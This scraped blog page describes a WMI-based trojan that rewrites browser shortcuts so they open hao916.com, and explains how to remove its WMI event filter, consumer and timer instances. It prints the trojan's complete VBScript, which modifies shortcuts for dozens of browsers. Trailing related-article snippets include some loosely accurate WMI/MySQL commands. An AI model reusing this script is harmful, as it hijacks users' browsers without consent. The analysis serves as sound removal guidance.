WMI 定时启动木马

最新推荐文章于 2019-06-16 01:38:00 发布
最新推荐文章于 2019-06-16 01:38:00 发布
阅读量6.3k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzz3265/article/details/54021162
版权

现象: 某些浏览器的快捷方式经常性自动被修改, 相当于主页修改成 hao916.com/.....


使用WMI_Tools 工具

找到以下类

__EventFilter
ActiveScriptEventConsumer
__FilterToConsumerBinding
__TimerInstruction

删除里面相关的实例


木马脚本如下

On Error Resume Next:
Const link = "http://hao916.com/?r=bdypjtssxx&m=d1":
Const link360 = "http://hao916.com/?r=bdypjtssxx&m=d1&s=3":
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":
lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\xxx\Desktop,C:\Users\xxx\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\xxx\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\xxx\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\xxx\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":
browsersArr = split(browsers,","):
Set oDic = CreateObject("scripting.dictionary"):
For Each browser In browsersArr:
oDic.Add LCase(browser), browser:
Next:
lnkpathsArr = split(lnkpaths,","):
Set oFolders = CreateObject("scripting.dictionary"):
For Each lnkpath In lnkpathsArr:
oFolders.Add lnkpath, lnkpath:
Next:
Set fso = CreateObject("Scripting.Filesystemobject"):
Set WshShell = CreateObject("Wscript.Shell"):
For Each oFolder In oFolders:
If fso.FolderExists(oFolder) Then:
For Each file In fso.GetFolder(oFolder).Files:
If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:
Set oShellLink = WshShell.CreateShortcut(file.Path):
path = oShellLink.TargetPath:
name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):
If oDic.Exists(LCase(name)) Then:
If LCase(name) = LCase("360se.exe") Then:
oShellLink.Arguments = link360:
Else:
oShellLink.Arguments = link:
End If:
If file.Attributes And 1 Then:
file.Attributes = file.Attributes - 1:
End If:
oShellLink.Save:
End If:
End If:
Next:
End If:
Next:


Yofoo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
使用WMI检测启动和停止操作系统过程的示例。
10-19
本示例着重讲解如何利用WMI来检测操作系统的启动和停止过程。以下是对每个文件内容的详细解释: 1. **01_DetectStart_InstanceCreationEvent**: 这个文件可能包含一个脚本或程序,它监听`InstanceCreationEvent`...
WMI配置指南与检查工具
06-21
其中含有WMI的配置信息,和常用的检测错误方法,WMI 中的“Instrumentation”特指 WMI 可以获得关于计算机内部状态的信息,这与汽车仪表盘获得并显示引擎的状态信息非常类似。WMI 对磁盘、进程、和其他 Windows 系统对象进行建模,从而实现“指示”功能。这些计算机系统对象采用类来建立模型,例如 Win32_LogicalDisk 或 Win32_Process; 如您所料,Win32_LogicalDisk 类用于建立在计算机上安装的逻辑磁盘的模型,Win32_Process 类用于建立正在计算机上运行的任何进程的模型。这些类基于一个名为通用信息模型(Common Information Model,CIM)的可扩展架构。CIM 架构是分布式管理任务组(Distributed Management Task Force)的一个公开标准
wmi
aslongas2015的博客
06-16 664
Windows Management Instrumentation Purpose(用途) Windows Management Instrumentation (WMI) is the infrastructure for management data and operations on Windows-based operating systems. You can write ...
关于WMI
weixin_33901641的博客
10-08 70
在.NET中通过WMI来获得相关硬件等的信息非常的方便,遗憾的是WINDOWS98不支持WMI,该如何解决?搜索了一下,还是没有头绪,听说有个插件可以使用,不知道哪里有下载的,要不就死了,应用如果不支持98?忒麻烦了。    ...
获取系统开机时间
weixin_30911451的博客
08-26 325
有时为了计算服务器运行时长,需要获取系统开机时间。 1: $RunTime = (Get-WmiObject -Class Win32_OperatingSystem -Namespace root\CIMV2).lastbootuptime 2: $Year = $RunTime.Substring(0,4) 3: $Month = $Runtime.Su...
WMI是什么?
superpan的专栏
04-20 6654
WMI是什么?  WMI是Windows 2K/XP管理系统的核心;对于其他的Win32操作系统,WMI是一个有用的插件。WMI以CIMOM为基础,CIMOM即公共信息模型对象管理器(Common Information Model Object Manager),是一个描述操作系统构成单元的对象数据库,为MMC和脚本程序提供了一个访问操作系统构成单元的公共接口。有了WMI,工具软件和脚本程序
什么是WMI
weixin_34302798的博客
04-23 1586
WMI(Windows Management Instrumentation,Windows 管理规范)是一项核心的 Windows 管理技术;用户可以使用 WMI 管理本地和远程计算机。作用:WMI以CIMOM为基础,CIMOM即公共信息模型对象管理器(Common Information Model Object Manager),是一个描述操作系统构...
WMI.rar_wmi
09-22
此外,文件可能还包含了如何检查WMI服务是否启动以及如何解决WMI相关问题的提示。 总的来说,WMI是Windows系统管理和自动化的重要工具,它提供了丰富的接口供管理员和开发者使用,极大地提高了工作效率。通过理解并...
WMI.zip_wmi
07-15
标题 "WMI.zip_wmi" 和描述 "11111读取硬件信息" 提到的核心知识点是 Windows Management Instrumentation(WMI),这是一个强大的管理工具,用于在Windows操作系统中获取和操作硬件、软件以及系统级别的信息。WMI是...
WMI
Reverser的专栏
06-30 989
WMI即windows管理规范。通过它可以访问、配置、管理和监视几乎所有的Windows资源。当然对于程序员而言在WMI体系结构中我们最需要关心的就是WMI提供的程序和接口。     WMI提供程序在WMI和托管资源之间扮演着中间方的角色。提供程序代表使用者应用程序和脚本从WMI托管资源请求信息,并发送指令到WMI托管资源。 下面是我们利用WMI编程经常要用到的WMI内置提供程序清单,以供
解决利用WMI劫持浏览器主页为hao123hao916等的修复工具及方法
02-10
该工具为最流行的版本 1.50.1131.1,75% 的安装比例,挺老的。使用完工具,要把所有浏览器的快捷方式,都改好。改完了,删掉任务栏上浏览器的快速启动项,重新添加改完了的浏览器快捷方式。
WMI工具,清理WMI执行文件
04-01
使用此工具可查出PROEWESHELL进程,处理此类自动执行软件,杀毒很好用,最近病毒太厉害了
WMI技术介绍和应用——WMI概述
热门推荐
方亮的专栏
12-28 4万+
今天,我要开始一系列关于微软WMI技术的介绍。通过之后若干节的介绍,我想WMI技术将为在windows平台上从事开发的朋友开启另外一扇窗。(转载请指明出于breaksoftware的csdn博客)         第一次接触WMI技术是在一年前,当时我接到一个研究型的需求,无意中发现WMI技术是最可靠的解决方案。当时,WMI这种“特别”的使用方式让我这个VC程序员产生了浓厚的兴趣——像写SQL般
WMI概述
灰太狼的博客
09-09 3022
关于wmi的定义可以在网上和msdn中查询,我在这里想说说自己对wmi的理解。Wmi是Windows Management Instrumentation(windows管理方法)的缩写。在wmi中微软以注册表形式提供了大量的设备信息,可以通过wmi中的相关方法来修改、设置这些设备的信息,从而达到控制计算机的目的。比如可以通过root/cimv2/win32_Directory中的delete方法
WMI 脚本入门:第一部分
海&火
09-09 2191
发布日期: 09/03/2004 | 更新日期: 09/03/2004Greg Stemp、Dean Tsaltas 和 Bob WellsMicrosoft CorporationEthan Wilansky网络设计小组摘要:Scripting Guys 的第一个 Scripting Clinic专栏展示了如何使用 WMI 脚本库创建大量有用的 Windows 系统管理脚本。
WMI远程启动进程
as_314159265的专栏
08-10 2038
<br />void LaunchProcess(string filename,string username,string password) { bool currentUser = false; string processName = ""; uint processID = 0; if( (username != null)&& (password != null)) currentUser = true; // LaunchProcess got username a
什么是WMI
12-19 1573
 什么是WMI WMI。中文名字叫Windows管理规范。从Windows 2000开始,WMI(Windows 管理规范)就内置于操作系统中,并且成为了Windows系统管理的重要组成部分。所以大家很容易就能见到它的,因为我们至少也应该是个Windows 2000的使用者了。下面我将详细介绍它的每个细节,让你从不认识它到喜欢上它。 WMI能做什么? WMI不仅可以获取想要的计算机数据,而
Microsoft Windows Management Instrumentation (WMI)简介
weixin_34190136的博客
05-16 233
什么是 WMIWMI最初于 1998 年作为一个附加组件与 Windows NT 4.0 Service Pack 4 一起发行,是内置在 Windows 2000、Windows XP 和 Windows Server 2003 系列操作系统中核心的管理支持技术。基于由 Distributed Management Task Force (DMTF) 所监督的业界标准,WMI 是一种规范和...
WMI如何启动MySQL
最新发布
09-24
### 回答1: WMI是一种Windows管理工具,用于管理Windows上的各种资源和应用程序。如果你想要通过WMI启动MySQL,可以按照以下步骤进行操作: 1. 打开命令提示符:在开始菜单中搜索“cmd”,然后右键单击“命令提示符”并选择“以管理员身份运行”。 2. 输入以下命令来连接到WMI服务:wmic 3. 输入以下命令来启动MySQL服务:service start mysql 4. 如果MySQL服务已经运行,则可以使用以下命令来停止服务:service stop mysql 请注意,这些命令可能会因操作系统版本和MySQL版本的不同而有所差异。如果出现任何错误,请参考MySQL文档或WMI文档以获取更多帮助。 ### 回答2: 要启动MySQL,你可以使用WMI(Windows Management Instrumentation)来执行相应的操作。以下是通过WMI启动MySQL的步骤: 1. 首先,通过WMI连接到本地或远程计算机的命名空间。可以使用VBScript、PowerShell或任何其他支持WMI的编程语言进行连接。 2. 通过WMI查询语言(WQL)查询MySQL服务的运行状态。可以使用类似于"SELECT * FROM Win32_Service WHERE Name='MySQL'"的查询语句来获取MySQL服务的信息。 3. 根据查询结果的返回值判断MySQL服务的状态。通常,返回值为"Running"表示MySQL服务已经在运行,而返回值为"Stopped"表示MySQL服务已停止。 4. 如果MySQL服务已停止,则可以通过WMI启动它。使用类似于"Win32_Service.StartService"的WMI方法来启动服务。 以下是一个使用PowerShell脚本来启动MySQL的示例: ``` $computerName = "." # 本地计算机 $serviceName = "MySQL" # MySQL服务名称 # 连接到WMI命名空间 $wmi = Get-WmiObject -Namespace "root\cimv2" -ComputerName $computerName # 查询MySQL服务的运行状态 $query = "SELECT * FROM Win32_Service WHERE Name='$serviceName'" $service = $wmi.ExecQuery($query) # 检查MySQL服务的状态并启动它 if ($service.State -eq "Stopped") { $service.StartService() Write-Host "MySQL服务已启动。" } else { Write-Host "MySQL服务已在运行中。" } ``` 以上示例中,使用PowerShell连接到WMI命名空间,并查询MySQL服务的状态。如果服务未运行,则使用WMI的StartService方法启动服务,并输出相关提示信息。 请注意,具体的细节可能会因操作系统版本、MySQL版本等因素而有所不同。建议在实际应用中查阅相关文档和参考资料,以确保正确配置和使用WMI启动MySQL。 ### 回答3: WMI是Windows Management Instrumentation的缩写,它是Windows操作系统的一种管理框架,用于监控和控制计算机系统的硬件和软件。MySQL是一个流行的开源关系型数据库管理系统。 要启动MySQL,可以使用WMI的命令行工具——Windows Management Instrumentation Command-line(WMIC)。以下是在命令提示符下使用WMIC启动MySQL的步骤: 1. 打开命令提示符:按下Win + R键,然后输入“cmd”,回车打开命令提示符窗口。 2. 输入以下命令以获取MySQL服务的状态: ``` wmic service where "name='mysql'" get name, state ``` 3. 如果MySQL服务的状态为“Stopped”,则可以使用以下命令启动MySQL: ``` wmic service where "name='mysql'" call startservice ``` 4. 您应该会看到一个提示,显示调用成功。 这些命令会使用WMI来操作Windows服务,通过查询服务的状态并调用相关方法来启动或停止服务。在这种情况下,我们查询名为“mysql”的服务,并调用“startservice”方法来启动MySQL服务。 注意:这些命令需要以管理员身份运行。如果您没有管理员权限,则无法启动或停止MySQL服务。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值